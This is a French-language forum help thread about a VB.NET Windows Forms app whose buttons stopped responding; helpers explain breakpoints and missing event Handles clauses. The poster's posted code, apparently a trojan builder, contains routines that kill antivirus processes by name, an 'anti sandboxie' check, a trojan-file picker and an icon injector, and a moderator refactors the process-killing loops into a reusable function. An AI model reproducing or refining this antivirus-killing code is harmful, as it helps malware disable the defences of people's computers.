Problème sur mon logiciel.

Résolu
MyEzioModz Messages postés 7 Date d'inscription mercredi 14 décembre 2016 Statut Membre Dernière intervention 15 décembre 2016 - 14 déc. 2016 à 00:47
Whismeril Messages postés 19020 Date d'inscription mardi 11 mars 2003 Statut Contributeur Dernière intervention 15 avril 2024 - 14 déc. 2016 à 07:22
Bonjour, bonsoir j'ai un problème sur mon logiciel visual basic en VB.NET

Problème:j'étais entrain de coder un savefileDialog puis quand mon code étais finis mon problème arriva plus aucun de mais buttons ne marchaient tout mais autre bouttons y compris le button pour enregistrer ne marchait plus donc j ai désidé de supprimer mon code pour le savefiledialog mais cela n'a eu aucun effet.
Pour plus d'information veulliez me contacter en message privé.

Merci de votre gentilesse et ne pas m'insulter pour quelqu'on que raison SVP.

4 réponses

jordane45 Messages postés 38136 Date d'inscription mercredi 22 octobre 2003 Statut Modérateur Dernière intervention 16 avril 2024 344
14 déc. 2016 à 01:46
Bonjour,

Pour plus d'information veulliez me contacter en message privé

NON !
Ici... on expose CLAIREMENT son souci ... et on montre son code.
Nul ne saurait t'aider par MP.

Merci donc de compléter ton explication ici dans ce message.


1
jordane45 Messages postés 38136 Date d'inscription mercredi 22 octobre 2003 Statut Modérateur Dernière intervention 16 avril 2024 344
Modifié par jordane45 le 14/12/2016 à 02:11
Pour commencer...

Tu as plusieurs fois le même code (à une variable prêt) ....
Code qui fait une boucle sur tous les process pour killer ceux dont le nom correspond à une variable...
Sans parler du case else initule dans chacun de tes switch...
A la limite.. pour une seule condition un IF aurait suffit...



Et puis... toutes tes boucles peuvent être changées par une simple instruction :
 'Kill le process notepad par exemple:
 Process.GetProcessesByName("notepad")(0).Kill()

et au pire une boucle dessus du genre au cas ou plusieurs process du même nom serait présent
On place le tout dans une fonction... y'aura plus qu'à appeller cette fonction dans tes sub.

bref un truc du genre :
function killproc(ByVal nomprocess as String) as integer
Dim proc as Process() = Process.GetProcessesByName(nomprocess)
For i As Integer = 0 To proc.Length - 1
     proc(i).kill()
Next
return proc.Length - 1
End Function
    • Non testé n'ayant pas de VisualStudio sous la main
    • (Possible qu'il y ait des erreurs... ça fait longtemps que je n'ai pas codé en .net )



Cordialement, 
Jordane                                                                 
1
MyEzioModz Messages postés 7 Date d'inscription mercredi 14 décembre 2016 Statut Membre Dernière intervention 15 décembre 2016
Modifié par MyEzioModz le 14/12/2016 à 02:17
Merci sa ma aider pour mon anti sandboxie mais par contre sa ne résolue pas mon probléme.
0
jordane45 Messages postés 38136 Date d'inscription mercredi 22 octobre 2003 Statut Modérateur Dernière intervention 16 avril 2024 344 > MyEzioModz Messages postés 7 Date d'inscription mercredi 14 décembre 2016 Statut Membre Dernière intervention 15 décembre 2016
14 déc. 2016 à 02:29
plus aucun de mais buttons ne marchaient tout mais autre bouttons y compris le button pour enregistrer ne marchait

Tu as essayé de mettre des points d'arrêt dans ton code et de voir sur quoi ça bloque ?
Tu n'aurais pas renommé tes boutons dans ton userform non plus ?
0
MyEzioModz Messages postés 7 Date d'inscription mercredi 14 décembre 2016 Statut Membre Dernière intervention 15 décembre 2016
14 déc. 2016 à 04:38
Non je n'est pas renommé les buttons.
0
Whismeril Messages postés 19020 Date d'inscription mardi 11 mars 2003 Statut Contributeur Dernière intervention 15 avril 2024 656
Modifié par Whismeril le 14/12/2016 à 07:22
Bonjour

Si j'en prends ce bout de code
Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load

Handles me.load signifie que cette méthode est abonnée à l'événement Load du winForm encours.

Quand je regarde les méthodes qui semblent être celles des boutons il n'y a aucun handles. Tu as deux options
  • soit tu les retapes à la main
  • soit en mode design, tu sélectionnes un bouton, dans la fenêtre propriété, tu passes dans l'onglet événements, tu cherches Click, et tu fais un simple click dans la zone de texte, ou sur les 3 petits points ou la petite flèche (selon ta version de Visual studio), une liste déroulante avec toutes les méthode dont la signature est compatible va apparaître, il ne te reste qu'à choisir la bonneQuand j'étais petit, la mer Morte n'était que malade.

George Burns
1
MyEzioModz Messages postés 7 Date d'inscription mercredi 14 décembre 2016 Statut Membre Dernière intervention 15 décembre 2016
Modifié par MyEzioModz le 14/12/2016 à 01:52
'Voici le code:
Imports System.Text
Imports System.IO

Public Class Form1
    Dim iconofd As New OpenFileDialog
    Dim fichier, icone As String
    Dim file As String
    Dim var As Integer

Sub Antiasquared()
        Dim ktp As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To ktp.Length - 1
            Select Case Strings.LCase(ktp(i).ProcessName)
                Case "a2servic.exe"
                    ktp(i).Kill()
                Case Else
            End Select
        Next
    End Sub

Sub AntiAvast()
        Dim ktp As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To ktp.Length - 1
            Select Case Strings.LCase(ktp(i).ProcessName)
                Case "ashWebSv.exe"
                    ktp(i).Kill()
                Case Else
            End Select
        Next
    End Sub
    Sub AntiAVG()
        Dim ktp As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To ktp.Length - 1
            Select Case Strings.LCase(ktp(i).ProcessName)
                Case "avgemc.exe"
                    ktp(i).Kill()
                Case Else
            End Select
        Next
    End Sub
    Sub AntiBitDefender()
        Dim KillTheProcess As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To KillTheProcess.Length - 1
            Select Case Strings.LCase(KillTheProcess(i).ProcessName)
                Case "bdagent"
                    KillTheProcess(i).Kill()
                Case Else
            End Select
        Next
    End Sub



Sub AntiKaspersky()
        Dim KillTheProcess As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To KillTheProcess.Length - 1
            Select Case Strings.LCase(KillTheProcess(i).ProcessName)
                Case "avp"
                    KillTheProcess(i).Kill()
                Case Else
            End Select
        Next
    End Sub

Sub AntiMalwarebytes()
        Dim KillTheProcess As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To KillTheProcess.Length - 1
            Select Case Strings.LCase(KillTheProcess(i).ProcessName)
                Case "mbam"
                    KillTheProcess(i).Kill()
                Case Else
            End Select
        Next
    End Sub
    Sub AntiMcAfee()
        Dim ktp As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To ktp.Length - 1
            Select Case Strings.LCase(ktp(i).ProcessName)
                Case "mcagent" & "mcuimgr"
                    ktp(i).Kill()
                Case Else
            End Select
        Next
    End Sub
    Sub AntiNOD32()
        Dim KillTheProcess As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To KillTheProcess.Length - 1
            Select Case Strings.LCase(KillTheProcess(i).ProcessName)
                Case "egui"
                    KillTheProcess(i).Kill()
                Case Else
            End Select
        Next
    End Sub
    Sub AntiNorton()
        Dim ktp As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To ktp.Length - 1
            Select Case Strings.LCase(ktp(i).ProcessName)
                Case "ccapp.exe"
                    ktp(i).Kill()
                Case Else
            End Select
        Next
    End Sub
    Sub Antisandboxie()
        On Error Resume Next
        If Me.Text.Contains("#") Then
            Me.Close()
        Else
            Me.Show()
        End If
    End Sub

Private Sub SkyDarkButton5_Click(sender As Object, e As EventArgs)
        Dim x As New OpenFileDialog
        x.Filter = "Exécutables |*.exe"
        x.InitialDirectory = "/VotreDossier"
        x.Multiselect = False
        SkyDarkButton5.Enabled = True
        If x.ShowDialog = Windows.Forms.DialogResult.OK Then
            LogInUserTextBox2.Text = x.FileName
        Else
            MsgBox("No open trojan Bro':( !!")

LogInUserTextBox2.Text = "No open trojan Bro':( !!"
        End If

End Sub

Private Sub SkyDarkButton1_Click(sender As Object, e As EventArgs)
        Dim x As New OpenFileDialog
        x.Filter = "Exécutables |*.ico"
        x.InitialDirectory = "/VotreDossier"
        x.Multiselect = False
        SkyDarkButton1.Enabled = True
        If x.ShowDialog = Windows.Forms.DialogResult.OK Then
            LogInPassTextBox1.Text = x.FileName
        Else
            MsgBox("No open icon Bro':( !!")

LogInPassTextBox1.Text = "No open icon Bro':( !!"
        End If
    End Sub

Private Sub SkyDarkRadio1_CheckedChanged(sender As Object, e As EventArgs)
        SkyDarkButton1.Enabled = False
    End Sub
    Private Sub SkyDarkRadio2_Click(sender As Object, e As EventArgs)
        SkyDarkButton1.Enabled = True
    End Sub

Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load
        SkyDarkButton1.Enabled = False
    End Sub

Private Sub SkyDarkButton8_Click(sender As Object, e As EventArgs)
        If SkyDarkRadio1.Checked Then
        End If
        If SkyDarkRadio2.Checked Then
            NotifyIcon1.ShowBalloonTip(1000)
            fichier = LogInUserTextBox2.Text
            icone = LogInPassTextBox1.Text
            Iconchanger.InjectIcon(fichier, icone)
        End If
    End Sub
End Class


EDIT : Ajout des balises de code

0
Rejoignez-nous